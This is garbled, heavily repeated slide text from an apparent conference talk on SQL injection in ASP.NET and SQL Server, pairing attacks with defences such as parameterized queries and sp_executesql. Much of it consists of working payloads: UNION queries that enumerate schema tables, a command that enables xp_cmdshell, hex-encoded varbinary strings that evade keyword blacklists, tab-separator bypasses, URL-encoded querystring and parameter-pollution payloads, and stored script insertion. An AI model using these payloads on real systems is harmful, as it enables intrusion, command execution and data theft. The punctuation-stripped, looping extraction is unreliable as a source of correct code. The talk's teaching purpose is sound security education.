ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
